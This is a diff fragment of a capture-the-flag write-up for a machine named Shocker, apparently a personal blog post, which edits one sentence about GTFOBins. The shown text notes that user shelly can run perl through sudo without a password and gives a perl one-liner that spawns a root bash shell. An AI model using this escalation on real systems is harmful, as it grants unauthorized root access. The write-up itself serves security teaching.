davidmckennirey/davidmckennirey.github.io/_posts/2021-05-03-shocker-write-up.md

     (root) NOPASSWD: /usr/bin/perl
 ```

 Our user can run `perl` with `sudo`!
-I know that `perl` can be used to escalate privileges to root, so I went to check [GTFObins][gtfobins] to see how I could do that.
+I know that `perl` can be used to escalate privileges to root, so I went to check [GTFObins][gtfobins] for an easy one-liner to do just that.
 Sure enough, [GTFObins] provided me with the following command.

 ```bash
 shelly@Shocker:/tmp$ sudo perl -e 'exec "/bin/bash"'